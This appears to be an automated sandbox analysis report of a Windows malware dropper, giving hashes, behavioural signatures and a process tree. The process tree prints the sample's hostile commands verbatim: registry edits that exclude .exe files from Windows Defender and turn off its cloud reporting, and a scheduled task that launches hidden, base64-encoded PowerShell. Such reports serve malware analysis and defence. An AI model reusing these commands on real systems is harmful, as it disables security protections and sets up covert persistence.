Analysis
-
max time kernel
81s -
max time network
95s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
-
submitted
13-10-2023 12:01
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
904d3651e8a0c6addb68c55f5f6423fe
-
SHA1
0312beddc2d850a6eff632e0eef0342fec578df0
-
SHA256
eab0692ed18990dcce2776eb44e8222a84fef4add05f14e147cccd6fb75a2676
-
SHA512
db1dc5cba18f28b9c2353aea025b177706edbf4b7f1adc59a7851e36c718765273cea3a26418373b321e0f97826cfcfe4829d23003f6764b963ee830c59dc3bc
-
SSDEEP
196608:91OHGkcLOqiUQaE0Cu1taVEjccTAZVdxBL+EdIgaW1TZB:3Om1ObUI0Cu3aVUcckxHL+EGgB11B
Malware Config
Signatures
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 2 IoCs
-
Drops file in System32 directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Suspicious use of WriteProcessMemory 36 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS52BF.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS55CC.tmp\Install.exe.\Install.exe /GdidPr "525403" /S3⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gtKfMGaXB" /SC once /ST 11:44:15 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gtKfMGaXB"4⤵
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.1MB
MD5d01c6aee235b42f1fc7ba49f2a6deff3
SHA1046e786a4618aef653c759aef61b49fea2e92036
SHA25685fe84f2f65860543080c1e67da8a0ba480b170d137b673d960d20599206b9a0
SHA512bd2fcc99aa92a474cb1760c2f9d5dfb511f52d5d8ce3006c3a52d295f5324d251199601b9cc9590d9a1c5fcd3e90c8bb47dad00aab42fe94ff97077688fde993
-
Filesize
6.1MB
MD5d01c6aee235b42f1fc7ba49f2a6deff3
SHA1046e786a4618aef653c759aef61b49fea2e92036
SHA25685fe84f2f65860543080c1e67da8a0ba480b170d137b673d960d20599206b9a0
SHA512bd2fcc99aa92a474cb1760c2f9d5dfb511f52d5d8ce3006c3a52d295f5324d251199601b9cc9590d9a1c5fcd3e90c8bb47dad00aab42fe94ff97077688fde993
-
Filesize
6.9MB
MD55fe3711f271c2156fbada341bedf0e4a
SHA1cf5d5044866b98d3ec8ef92aaeefcacf0e79b5dd
SHA25650727172bf8ffc8b4e084b90c652c57346f3a808ba20bf073175aceac5339711
SHA5123c0f675ebc07f1e4fe94a3c998cff3eb844d4567632c9f32c40d7ac7471de4150e9e67ef46cda73343f0d54fb97684e261b3f74d548c132ab3087c5ba07be2fb
-
Filesize
7.0MB
-
Filesize
5.4MB
-
Filesize
7.0MB